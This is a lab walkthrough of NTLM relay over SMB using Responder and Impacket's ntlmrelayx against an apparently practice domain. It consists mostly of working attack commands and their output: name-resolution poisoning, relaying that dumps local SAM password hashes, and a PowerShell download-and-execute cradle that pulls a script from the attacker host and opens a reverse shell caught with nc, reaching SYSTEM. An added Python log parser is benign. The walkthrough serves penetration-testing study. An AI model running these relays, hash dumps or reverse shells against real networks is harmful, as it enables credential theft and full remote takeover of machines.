NTLM Relay over SMB
1. ntlmrelayx
https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
ntlmrelayx is Impacket's general-purpose NTLM relay module; it supports NTLM relay and a variety of post-relay attacks.
Below we use this tool to demonstrate NTLM Relay over SMB.
2. Modify the Responder config
Because ntlmrelayx and Responder conflict on some ports/protocols, and we need ntlmrelayx to relay SMB and HTTP to the target servers here, we first edit Responder's configuration file and set SMB and HTTP to Off, so that Responder does not listen on them and cause a port conflict.
vim /usr/share/responder/Responder.conf
3. NTLM Relay over SMB
Attack flow:
- 172.16.117.30 (attack machine) runs Responder and ntlmrelayx.
- When a user on the domain controller (172.16.117.3) mistypes a UNC path and Windows tries to connect to it, Responder poisons the name-resolution response and redirects the user to our attack machine to authenticate.
- When they connect to our attack host, ntlmrelayx relays that authentication to the servers configured as targets (172.16.117.50 and 172.16.117.60); because the user INLANEFREIGHT/PETER is an administrator on 172.16.117.50, this results in a successful SAM dump.
3.1.1. Run Responder (poisoning mode)
python3 Responder.py -I ens192
3.1.2. Relaying SMB with ntlmrelayx
ntlmrelayx provides the -t and -tf options to specify relay targets:
ntlmrelayx.py -tf relayTargets.txt -smb2support
- -t specifies a single relay target.
- -tf specifies a file containing multiple relay targets.
- If -t / -tf is omitted, ntlmrelayx relays the NTLM authentication back to the originating host; this is known as an NTLM self-relay attack (patched, but still present on some older machines).
- -smb2support provides SMBv2 support for hosts that need it.
By default, ntlmrelayx relays NTLM authentication over SMB. If the relayed session has high privileges on the target machine, ntlmrelayx attempts a SAM dump.
Wait for Responder to poison the authentication toward us; ntlmrelayx then relays it to the target machine.
ntlmrelayx.py -tf relayTargets.txt -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/JPEREZ@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/JPEREZ SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Target system bootKey: 0x563136fa4deefac97a5b7f87dca64ffa
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Done dumping SAM hashes for host: 172.16.117.50
[*] Stopping service RemoteRegistry
If the NTLM relay attack has no effect, we can restart ntlmrelayx and Responder.
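The output above mixes relay successes, rpc_s_access_denied failures and the SAM dump itself, so it is easy to lose track of which relayed account was actually a local administrator on which target (the fact a remediation needs). The following parser is an added example, not part of the original notes or of Impacket; it runs over a constructed excerpt modelled on the session above, maps each relayed principal to its target and outcome, and flags SAM entries whose NT hash is the empty-password hash. Attributing post-relay results to the most recent SUCCEED line is a simplification, since real output interleaves several SMBD threads.

```python
import re
# Constructed excerpt modelled on the ntlmrelayx session shown above; not a real capture.
SAMPLE_LOG = """\
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/JPEREZ@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/JPEREZ SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: 172.16.117.50
"""

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

AUTH_RE = re.compile(r"Authenticating against (\S+) as (\S+) SUCCEED")
DONE_RE = re.compile(r"Done dumping SAM hashes for host: (\S+)")
SAM_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")

def summarize_relay_log(text):
    """Return (sessions, sam_entries) parsed from ntlmrelayx output.
    A session is {user, target, outcome}: 'privileged' when a SAM dump
    completed on the target, 'access_denied' when the relayed session had no
    admin rights, else 'relayed' (attributed to the most recent SUCCEED line)."""
    sessions, sam_entries, pending = [], [], []
    for line in text.splitlines():
        if m := AUTH_RE.search(line):
            sessions.append({"target": m[1], "user": m[2], "outcome": "relayed"})
        elif "rpc_s_access_denied" in line and sessions and sessions[-1]["outcome"] == "relayed":
            sessions[-1]["outcome"] = "access_denied"
        elif m := SAM_RE.match(line):
            pending.append({"user": m[1], "rid": int(m[2]), "nt": m[4],
                            "empty_password": m[4] == EMPTY_NT_HASH})
        elif m := DONE_RE.search(line):
            for entry in pending:
                entry["host"] = m[1]
            sam_entries += pending
            pending = []
            # A completed dump proves the relayed account is a local admin on this host.
            for s in reversed(sessions):
                if s["target"].endswith(m[1]):
                    s["outcome"] = "privileged"
                    break
    return sessions, sam_entries

if __name__ == "__main__":
    for s in summarize_relay_log(SAMPLE_LOG)[0]:
        print(f'{s["user"]:22} -> {s["target"]:22} {s["outcome"]}')
```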
3.1.3. Executing commands with ntlmrelayx
Besides the SAM dump, the -c "Command To Execute" option runs a command on the target machine; these commands are executed over SMB. Here we try a single ping back to our attack host:
ntlmrelayx.py -tf relayTargets.txt -smb2support -c 'ping -n 1 172.16.117.30'
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Once Responder has poisoned the broadcast traffic, we see ntlmrelayx relay the NTLM authentication from 172.16.117.3 and establish an authenticated session on 172.16.117.50; it then uses PETER's session to run the ping command, and the reply appears in the output.
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] Service RemoteRegistry is in stopped state
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.117.50
Pinging 172.16.117.30 with 32 bytes of data:
Reply from 172.16.117.30: bytes=32 time<1ms TTL=64
Ping statistics for 172.16.117.30:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
A reverse shell can also be obtained.
We will use this call-back script:
ntlmrelayx.py -tf relayTargets.txt -smb2support -c "powershell -c IEX(New-Object NET.WebClient).DownloadString('http://172.16.117.30:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.117.30 -Port 7331"
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Executed specified command on host: 172.16.117.50
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)
[*] Stopping service RemoteRegistry
nc -lvnp 7331
Listening on 0.0.0.0 7331
Connection received on 172.16.117.50 57666
Windows PowerShell running as user WS01$ on WS01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system

